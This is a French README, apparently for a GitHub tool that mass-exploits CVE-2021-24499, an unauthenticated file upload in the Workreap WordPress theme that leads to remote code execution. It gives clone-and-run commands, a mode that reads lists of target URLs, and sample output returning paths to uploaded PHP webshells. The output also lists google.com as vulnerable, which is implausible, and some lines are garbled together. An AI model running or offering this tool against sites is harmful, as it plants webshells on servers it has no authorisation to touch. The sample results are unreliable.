
Thème WordPress Workreap 2.2.2 - Upload non authentifié menant à l'exécution de code à distance
Thème WordPress Workreap 2.2.2 - Téléchargement de fichier non authentifié menant à une exécution de code à distance
Un outil d'exploitation massive puissant et précis pour la vulnérabilité CVE-2021-24499 dans le thème Workreap de WordPress. Cette exploitation permet le téléchargement non authentifié de fichiers, pouvant conduire à une exécution de code à distance (RCE).
CVE-2021-24499 est une vulnérabilité critique dans le thème WordPress Workreap (version 2.2.2 et inférieures) qui permet à des utilisateurs non authentifiés de télécharger des fichiers arbitraires, y compris des fichiers PHP, via l'action AJAX workreap_award_temp_file_uploader. Cela peut conduire à une exécution de code à distance (RCE) sur le serveur cible.
Versions vulnérables : Toutes les versions jusqu'à la 2.2.2 incluse
Score CVSS : Critique
curlopts.php ou shell.php (webshell PHP)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php ou shell.php dans le même répertoire (votre webshell PHP)Cible unique :
./exploit.sh -u http://target.com
Cibles multiples (depuis un fichier) :
./exploit.sh -l targets.txt
Afficher l'aide :
./exploit.sh --help
| Option | Description |
|---|---|
-u URL | Exploiter une seule URL cible |
-l FICHIER | Exploiter plusieurs cibles depuis un fichier (une URL par ligne) |
--help | Afficher le menu d'aide |
Créez un fichier texte avec une URL par ligne :
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Téléchargement non authentifié menant à une exécution de code à distance | CVE-2021-24499
Réalisé par Jay Maranatha Hutajulu
https://domain.com/ >> VULNÉRABLE !
--> SHELL : https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Téléchargement non authentifié menant à une exécution de code à distance | CVE-2021-24499
Réalisé par Jay Maranatha Hutajulu
https://domain.com >> NON VULNÉRABLE !
https://www.google.com >> VULNÉRABLE !
https://www.domain.com >> NON VULNÉRABLE !
https://google.com >> VULNÉRABLE !
Cet outil est fourni à des fins éducatives et de tests autorisés uniquement.
En utilisant cet outil, vous acceptez de l'utiliser uniquement à des fins légitimes de tests de sécurité et de recherche.
Auteur : Jay Maranatha Hutajulu
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Les contributions, les signalements de problèmes et les demandes de fonctionnalités sont les bienvenus ! N'hésitez pas à consulter la page des issues.
Si vous trouvez cet outil utile, pensez à lui donner une étoile ⭐
Rappel : Utilisez toujours les outils de sécurité de manière responsable et éthique. Bon hacking ! 🚀